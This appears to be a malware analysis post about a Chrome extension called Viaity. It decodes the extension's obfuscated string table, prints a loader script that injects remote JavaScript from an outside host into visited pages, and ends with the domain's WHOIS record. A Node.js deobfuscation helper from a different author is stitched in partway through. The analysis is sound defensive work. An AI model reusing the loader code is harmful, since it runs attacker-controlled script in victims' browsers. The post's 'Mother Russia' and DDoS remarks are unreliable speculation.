Viaity is a JavaScript malware (Chrome Extension)
#jw8tzr\dppzfzixq.js
While reading dppzfzixq.js I found this suspicious array, which is obviously the string table holding the keywords the script uses most:
var G = ['\x73\x63\x72\x69\x70\x74',
'\x6c\x61\x6e\x67\x75\x61\x67\x65',
'\x52\x64\x72',
'\x68\x74\x74\x70\x73\x3a',
'',
'\x61\x32\x78\x68\x63\x33\x52\x6c\x63\x6e\x4d\x75\x65\x48\x6c\x36\x4c\x7a\x41\x77\x4d\x6a\x49\x75\x61\x6e\x4d\x3d',
'\x61\x78\x6d\x56\x55',
'\x47\x67\x69\x35\x44\x58\x30',
'\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64',
'\x6c\x6f\x63\x61\x74\x69\x6f\x6e',
'\x2f\x2f',
'\x6e\x79\x74\x69\x6d\x65\x73\x2e\x63\x6f\x6d',
'\x69\x6e\x64\x65\x78\x4f\x66',
'\x64\x72\x69\x76\x65\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d',
'\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74',
'\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d',
'\x72\x65\x70\x6c\x61\x63\x65',
'\x68\x6f\x73\x74\x6e\x61\x6d\x65',
'\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d',
'\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74',
'\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d',
'\x6d\x61\x69\x6c\x2e\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d',
'\x50\x38\x45\x37',
'\x46',
'\x74\x79\x70\x65',
'\x48\x65',
'\x46\x54\x32\x73\x68\x32\x31',
'\x68\x65\x61\x64',
'\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74',
'\x73\x72\x63'];
After decoding the array, these are the strings it holds:
script
language
Rdr
https:
(empty string)
a2xhc3RlcnMueHl6LzAwMjIuanM=
axmVU
Ggi5DX0
appendChild
location
//
nytimes.com
indexOf
drive.google.com
text/javascript
facebook.com
replace
hostname
google.com
createElement
accounts.google.com
mail.google.com
P8E7
F
type
He
FT2sh21
head
javascript
src
The domains in the list: facebook.com, google.com, accounts.google.com, mail.google.com, drive.google.com, and nytimes.com!!
Okay, now it seems like he wants to steal some information from my Google and Facebook accounts, but why nytimes.com? Maybe he wants to hit their server with a DDoS. So interesting, huh! Especially the base64 string a2xhc3RlcnMueHl6LzAwMjIuanM=: after decoding it, it turns out to be a JavaScript file on a domain owned by the attacker: http://klasters.xyz/0022.js
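As an added example (my own Node.js triage helper, not code from the post or from the extension), here is a script that does the decoding above automatically: it pulls the quoted entries out of the `var G = [...]` table, resolves the \xHH escapes, and flags any entry that additionally decodes as base64, so a hidden URL like klasters.xyz/0022.js shows up at a glance. The input is a constructed excerpt of the array shown above; `extractStringTable`, `unescapeJs`, `tryBase64` and `decodeStringTable` are names I chose.

```javascript
// Constructed excerpt of the obfuscated string table shown above (not the full array).
const SAMPLE = String.raw`var G = ['\x73\x63\x72\x69\x70\x74',
'\x68\x74\x74\x70\x73\x3a',
'',
'\x61\x32\x78\x68\x63\x33\x52\x6c\x63\x6e\x4d\x75\x65\x48\x6c\x36\x4c\x7a\x41\x77\x4d\x6a\x49\x75\x61\x6e\x4d\x3d',
'\x68\x6f\x73\x74\x6e\x61\x6d\x65',
'\x66\x61\x63\x65\x62\x6f\x6f\x6b\x2e\x63\x6f\x6d'];`;

// Pull the quoted entries out of the first `var NAME = [ ... ];` table in a script.
function extractStringTable(src) {
  const table = src.match(/var\s+(\w+)\s*=\s*\[([\s\S]*?)\];/);
  if (!table) return { name: null, entries: [] };
  const entries = [];
  const quoted = /'((?:[^'\\]|\\.)*)'/g;
  let m;
  while ((m = quoted.exec(table[2])) !== null) entries.push(m[1]);
  return { name: table[1], entries };
}

// Resolve \xHH and \uHHHH escapes the way the JS engine does when the script loads.
function unescapeJs(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})/g,
    (_, h2, h4) => String.fromCharCode(parseInt(h2 || h4, 16)));
}

// Heuristic second pass: an entry that is valid base64 of sensible length and
// decodes to printable ASCII is probably a hidden URL or keyword.
function tryBase64(s) {
  if (s.length < 8 || s.length % 4 !== 0 || !/^[A-Za-z0-9+/]+={0,2}$/.test(s)) return null;
  const out = Buffer.from(s, 'base64').toString('latin1');
  return /^[\x20-\x7e]+$/.test(out) ? out : null;
}

// Decode the whole table and list the entries that hide a second base64 layer.
function decodeStringTable(src) {
  const { name, entries } = extractStringTable(src);
  const decoded = entries.map(unescapeJs);
  const base64 = decoded
    .map((d, i) => ({ index: i, raw: d, decoded: tryBase64(d) }))
    .filter(x => x.decoded !== null);
  return { name, decoded, base64 };
}

// Stand-alone usage: print the decoded table and any hidden base64 values.
const result = decodeStringTable(SAMPLE);
result.decoded.forEach((d, i) => console.log(i, JSON.stringify(d)));
result.base64.forEach(b => console.log('base64 at index', b.index, '->', b.decoded));
```

Short identifiers such as axmVU or P8E7 fail the length and printability checks, so only real second-layer strings are reported.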
Content of 0022.js:
(function () {
  // Build a <script> tag that loads the remote payload asynchronously...
  var scr = document.createElement('script');
  scr.type = 'text/javascript';
  scr.async = true;
  // ...with a random query string so every load fetches a fresh copy instead of a cached one.
  scr.src = 'https://extstat.com/code/?pid=444202&r=' + Math.floor(10000000 * Math.random());
  // Insert it before the page's first existing <script> so it runs in the page context.
  var s = document.getElementsByTagName('script')[0];
  s.parentNode.insertBefore(scr, s);
})();
It seems like this malware is kind of a botnet: it executes whatever 0022.js contains. This time it loads a script from https://extstat.com/code/, and I have no idea what that is; maybe it hits some ads to earn money, but that's a guess. Next time he can change the content of 0022.js to something else, who knows.
WHOIS for http://klasters.xyz (via http://whois.domaintools.com/klasters.xyz):
Domain Name: KLASTERS.XYZ
Domain ID: D32657463-CNIC
WHOIS Server: whois.reg.ru
Referral URL: https://www.reg.ru/
Updated Date: 2016-07-29T12:10:50.0Z
Creation Date: 2016-06-20T14:56:35.0Z
Registry Expiry Date: 2017-06-20T23:59:59.0Z
Sponsoring Registrar: Registrar of Domain Names REG.RU, LLC
Sponsoring Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant ID: C71037363-CNIC
Registrant Name: Stela Diacon
Registrant Organization: Cash Makers LP
Registrant Street: Suite 2,5 St. Vincent Street
Registrant City: Edinburgh
Registrant State/Province: Edinburgh
Registrant Postal Code: EH3 6SW
Registrant Country: GB
Registrant Phone: +380.947109131
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Admin ID: C71037367-CNIC
Admin Name: Stela Diacon
Admin Organization: Cash Makers LP
Admin Street: Suite 2,5 St. Vincent Street
Admin City: Edinburgh
Admin State/Province: Edinburgh
Admin Postal Code: EH3 6SW
Admin Country: GB
Admin Phone: +380.947109131
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
Tech ID: C71037375-CNIC
Tech Name: Stela Diacon
Tech Organization: Cash Makers LP
Tech Street: Suite 2,5 St. Vincent Street
Tech City: Edinburgh
Tech State/Province: Edinburgh
Tech Postal Code: EH3 6SW
Tech Country: GB
Tech Phone: +380.947109131
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: [email protected]
Name Server: NS1.REG.RU
Name Server: NS2.REG.RU
DNSSEC: unsigned
Billing ID: C71037371-CNIC
Billing Name: Stela Diacon
Billing Organization: Cash Makers LP
Billing Street: Suite 2,5 St. Vincent Street
Billing City: Edinburgh
Billing State/Province: Edinburgh
Billing Postal Code: EH3 6SW
Billing Country: GB
Billing Phone: +380.947109131
Billing Phone Ext:
Billing Fax:
Billing Fax Ext:
Billing Email: [email protected]
Mother Russia!!!!
More and more!! The email [email protected] is associated with 18 other domains, and the company name is associated with 21 domains!!
http://reversewhois.domaintools.com/?email=4ac46717409d6bec5ffebebdc48183a1